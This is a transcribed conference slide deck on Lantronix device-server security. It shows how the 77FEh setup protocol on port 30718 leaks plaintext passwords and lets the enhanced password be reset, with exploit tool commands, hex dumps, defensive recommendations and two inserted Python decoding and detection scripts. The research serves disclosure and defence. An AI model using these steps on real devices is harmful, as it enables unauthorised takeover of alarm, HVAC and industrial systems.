confidence 2014: vlatko kosturjak: exploring treasures of 77feh

Mos Eisley Lab – Confidence 2014 – Exploring treasures of 77FEh – Getting access to Lantronix devices – Vlatko Kosturjak, Diverto @k0st

Upload: proidea

Post on 29-Jan-2018


Page 1: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

MosEisleyLab

Confidence 2014

Exploring treasures of 77FEh
Getting access to Lantronix devices

Vlatko Kosturjak, Diverto, @k0st

Page 2: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Who are you!?!!??

● Security Jedi at Diverto
– Bringing balance to the force

● Experience
– Offensive (Penetration tester)
– Defensive (Developer/System Administrator/...)
– Have code in: Nmap, Metasploit, OpenVAS, …
– Author of free software: https://github.com/kost/

● If you trust in certificates
– CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...

Page 3: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Agenda

● Introduction - Lantronix
● Physical access
● WTF is 77FEh?
● Vulnerabilities & Exploitation
● Recommendations
● Questions and answers

45 minutes

Page 4: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Lantronix

Source: www.lantronix.com

Page 5: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

You can find them as an integral part of

● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners - Roombas
● Embedded systems
● Industrial systems

Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight

Page 6: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

What are they actually running?

● OS
– CoBos (mostly)
– Evolution OS/Linux
– ThreadX
– Linux

● Support
– 1 or more serial ports
– Modbus (few models)
– 10/100 Ethernet

Page 7: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Physical access

● Like usual
– Game over

● Serial access
– No password by design

● Requirements
– Standard TTL cable
– BusPirate
– ...

Page 8: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Connecting to serial port...

● 9600 bps 8/N/1
● Flow control: None

Page 9: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Most frequent services available – TCP/IP

● Web (tcp/80) – simple web server serving an applet JAR which talks to port 30718
● Telnet (tcp/9999) – Telnet administration interface
● 77FEh (tcp-udp/30718) – What is this?
● SNMP (udp/161) – mostly information disclosures

Page 10: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Device Discovery

● Ask :)
● Look if you have physical access
● Passive
● Active/Scanning
– Standard port scanning is fine with conservative timing
– Broadcast UDP to specific Lantronix ports (30718)

● Beware
– Version scanning (-sV) or running vulnerability scanners may misconfigure the device

Page 11: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Telnet administration

$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :

Page 12: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

So, WTF is 77FEh finally?

● 0x77FE = 30718 (decimal)
● TCP/UDP protocol for device setup
– Proprietary protocol
– Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
– Setup of device
– Administration of device
– Getting device info
– Insecurity (sorry, had to write it, you'll see later ;) )

Page 13: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Sample 77FEh communication

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>

[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...

Callouts on the dump:
– 000000f6: Query setup request (4)
– 000000f7: Query setup response (4)
– Device type
– Last 6 bytes (00204a91 84fb): MAC address of the device (6)

Page 14: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Interesting request – #1

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>

[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....

[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............

Callouts on the dump:
– 000000f8 / 000000f9: Query setup (4)
– c0a809c9: IPv4 (4)
– 54455354 "TEST": Simple password, in plaintext (4)
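As an added example (mine, not part of the talk or of lantronix-witchcraft), a small Python decoder for the two replies hex-dumped on slides 13 and 14: it pulls the MAC address from the 000000f7 reply and the IPv4 address and plaintext simple password from the 000000f9 reply, so a defender can inventory exactly what an exposed 30718 port hands out. Field offsets are read off the slide callouts; the sample bytes are constructed from the dumps above.

```python
# Added example: decoder for the two 77FEh query responses shown on slides 13 and 14.
# Field offsets follow the slide callouts; sample bytes are constructed from the dumps.

QUERY_SETUP_RESP = 0xF7     # reply to request 000000f6
SETUP_RECORD0_RESP = 0xF9   # reply to request 000000f8


def opcode(msg: bytes) -> int:
    """Return the 4th header byte; the first three bytes of every 77FEh message are zero."""
    if len(msg) < 4 or msg[:3] != b"\x00\x00\x00":
        raise ValueError("not a 77FEh message")
    return msg[3]


def parse_query_setup_response(msg: bytes) -> dict:
    """000000f7 reply (30 bytes on the slide): the MAC address is the trailing 6 bytes."""
    if opcode(msg) != QUERY_SETUP_RESP or len(msg) < 10:
        raise ValueError("expected a 000000f7 response")
    return {"mac": ":".join(f"{b:02x}" for b in msg[-6:])}


def parse_setup_record0_response(msg: bytes) -> dict:
    """000000f9 reply: IPv4 at offset 4, 4-byte simple password in plaintext at offset 12."""
    if opcode(msg) != SETUP_RECORD0_RESP or len(msg) < 16:
        raise ValueError("expected a 000000f9 response")
    password = msg[12:16].rstrip(b"\x00")
    return {
        "ipv4": ".".join(str(b) for b in msg[4:8]),
        "simple_password": password.decode("ascii", errors="replace"),
        "simple_password_set": bool(password),  # all zeros means no simple password
    }


# Constructed samples: the byte strings exactly as hex-dumped on slides 13 and 14.
SAMPLE_F7 = bytes.fromhex(
    "000000f7 00108005 58324400 df0e0000 62a7d944 00000000 00204a91 84fb")
SAMPLE_F9 = bytes.fromhex("000000f9 c0a809c9 00000000 54455354") + bytes(108)

if __name__ == "__main__":
    print(parse_query_setup_response(SAMPLE_F7))    # {'mac': '00:20:4a:91:84:fb'}
    print(parse_setup_record0_response(SAMPLE_F9))  # ipv4 192.168.9.201, password 'TEST'
```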

Page 15: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Previous work

● Metasploit
– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

● Tools
– Simple C program by jgor
● https://github.com/jgor/lantronix-telnet-pw

Page 16: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

But...

● Simple password is not set
● Device still asks for password
● Further digging
– Enhanced password in place
– You cannot get/reset the enhanced password easily
– Length is bigger (4->16)
– Challenge!!!

Page 17: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Introduction to enhanced passwords

Source: Lantronix documentation

Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no

Page 18: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Source: Mohdafri.com

Page 19: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Interesting request - #2

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>

[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)

Callouts on the dump:
– 000000f4: Query ext version request (4)
– 54455354 "TEST": Simple password, in plaintext (4)
– "5.8.8.3": Version (6)

Page 20: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Interesting request #3

● Request to query configuration
– 000000eX
● Response to query configuration
– 000000bX, followed by 126 bytes of setup
● X = setup record number (0 – F):
– 0 basic setup record
● Simple password, IP...
– 1 security record
● Enhanced password, AES key, SNMP...
– 2 specific products / situations
– 3 OEMs
– ...

HALF wrong! Request for security record 1 provides just zero bytes!

Page 21: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Interesting request #4

● Request to change configuration
– 000000cX, followed by 126 bytes of setup
● Response to change configuration
– 000000bX
● X = setup record number (0 – F):
– 0 basic setup record
– 1 security record
– 2 specific products / situations
– 3 OEMs
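Added example (mine, not from the talk or from lantronix-witchcraft): a classifier for request payloads seen on tcp/udp 30718, built from the opcode families the slides list (000000f6/f8/f4 queries, 000000eX query configuration, 000000cX set configuration with 126 bytes of setup, 000000bX responses), that raises an alert when a configuration write, or the password-disclosing 000000f8 query, comes from a host outside an allow list of management stations. The flow tuples and the allow list are constructed sample data.

```python
# Added example: classify 77FEh requests by the opcode families on slides 12-14, 20 and 21
# and alert on configuration writes from hosts outside an allow list. Sample data is constructed.
QUERY_OPCODES = {
    0xF6: "query setup (MAC)",
    0xF8: "query setup record 0 (IPv4, simple password in plaintext)",
    0xF4: "query extended version",
}
RECORD_NAMES = {0: "basic setup", 1: "security", 2: "product/situation specific", 3: "OEM"}
SETUP_RECORD_LEN = 126  # bytes of setup that follow a 000000cX header

def classify_request(payload: bytes) -> dict:
    """Name one payload sent to port 30718 and rate how sensitive the operation is."""
    if len(payload) < 4 or payload[:3] != b"\x00\x00\x00":
        return {"kind": "not 77FEh", "severity": "info"}
    op = payload[3]
    if op in QUERY_OPCODES:
        # Read-only, but 0xF8 hands out the simple password in plaintext.
        return {"kind": QUERY_OPCODES[op], "severity": "medium" if op == 0xF8 else "low"}
    rec, name = op & 0x0F, RECORD_NAMES.get(op & 0x0F, "other")
    if 0xE0 <= op <= 0xEF:
        return {"kind": f"query configuration record {rec} ({name})", "severity": "low"}
    if 0xC0 <= op <= 0xCF:
        # Writing record 1 replaces the enhanced password, AES key and SNMP settings.
        return {"kind": f"set configuration record {rec} ({name})",
                "severity": "high" if rec == 1 else "medium",
                "well_formed": len(payload) == 4 + SETUP_RECORD_LEN}
    if 0xB0 <= op <= 0xBF:
        return {"kind": f"configuration response, record {rec}", "severity": "info"}
    return {"kind": f"unknown opcode 0x{op:02x}", "severity": "info"}

def alerts(flows, allowlist):
    """One alert line per medium/high request whose source is not an allowed admin host."""
    return [f"{src} -> {dst}:30718 {c['kind']} [{c['severity']}]"
            for src, dst, payload in flows
            for c in [classify_request(payload)]
            if c["severity"] in ("medium", "high") and src not in allowlist]

# Constructed flows (source, destination, payload); 10.0.0.2 stands in for the DeviceInstaller host.
SAMPLE_FLOWS = [
    ("10.0.0.5", "192.168.1.101", bytes.fromhex("000000f6")),
    ("10.0.0.5", "192.168.1.101", bytes.fromhex("000000f8")),
    ("10.0.0.9", "192.168.1.101", bytes.fromhex("000000c1") + bytes(SETUP_RECORD_LEN)),
    ("10.0.0.2", "192.168.1.101", bytes.fromhex("000000c1") + bytes(SETUP_RECORD_LEN)),
]
ALLOWLIST = {"10.0.0.2"}

if __name__ == "__main__":
    print("\n".join(alerts(SAMPLE_FLOWS, ALLOWLIST)))
```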

Page 22: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Setting setup record 1 for security

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>

[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....

Callouts on the dump:
– 000000c1: Set setup record 1 (security) request
– 7075626c6963 "public": SNMP community string (13)
– Enhanced password (16)
– 000000b1: Setting setup record 1 was successful

Page 23: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Enhanced password gone, no password to enter!

$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode

Page 24: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Authentication Algorithm Guess

Flowchart (reconstructed from the slide labels):
● Authenticate
● Enhanced password
– Enhanced set: Ask for enhanced
– Enhanced not set: go to Simple password
● Simple password
– Simple set: Ask for simple
– Simple not set: Display setup menu
● Password OK: Display setup menu

Page 25: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

New tool: lantronix-witchcraft

● 77FEh protocol implementation
● 77FEh security related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
– https://github.com/kost/lantronix-witchcraft

Page 26: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Basic usage:

● Display MAC address:
– ./lantronix-witchcraft.pl -Q <ip>
● Display Simple Password (up to 4 characters):
– ./lantronix-witchcraft.pl -P <ip>
● Reset Security record (together with enhanced password):
– ./lantronix-witchcraft.pl -E <ip>
● Reset Security record without AES (with enhanced password):
– ./lantronix-witchcraft.pl -S <ip>
● Dump setup records:
– ./lantronix-witchcraft.pl -G -D <ip>

Page 27: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Brave enough?

● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
– ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>

Page 28: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Still wondering why automatic scanning is bad for Lantronix?

● Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|

Page 29: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Correct way

● Ask
– Someone responsible if they could have something like that
● Send broadcast query packet to 77FEh
● Identify ports 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
– If yes, perfect
– If not: huh, but you should restore setup records somehow ;)

Page 30: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

It's not about Lantronix...

● ...they warned the vendors about it in their documentation

Source: Lantronix documentation

Page 31: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Disclosure Problem

● It's more about vendors who implement Lantronix in their devices
● Whom to report?
– Lantronix – I guess they know their protocol ;)
– OEMs – hard to find all their customers ;)
● Awareness
– Conference
– Tools

Page 32: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

But maybe it could be done...

● Add white list
● Encryption/SSL?

Source: Lantronix documentation

Page 33: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Recommendations

● Have some other device to VPN/SSL tunnel the services
● Telnet only through VPN or other secure channel to administration interface
● Disable 77FEh if not needed
● Filter out 77FEh on network devices to only allowed ones
● Disable other unnecessary services (SNMP, telnet, etc.)

Page 34: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Summary

Source: duki@fb

Page 35: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Summary

● There are ways to pass beyond authentication (if 77FEh is enabled)
– Simple passwords
– Enhanced passwords
● Tools
– Metasploit Lantronix modules
– https://github.com/kost/lantronix-witchcraft
● Recommendations
– Disable 77FEh if not needed or filter out 77FEh on network devices to only allowed ones
– Tunnel VPN/SSL all communication to these devices
● Future
– There are things to research: way to obtain enhanced password or AES keys, for example

Page 36: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Acknowledgements - Thanks

● Previous work (Simple Passwords)
– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
– Dalibor Dosegović, hardware wizard

Page 37: CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Thank you!

Questions and Answers
@k0st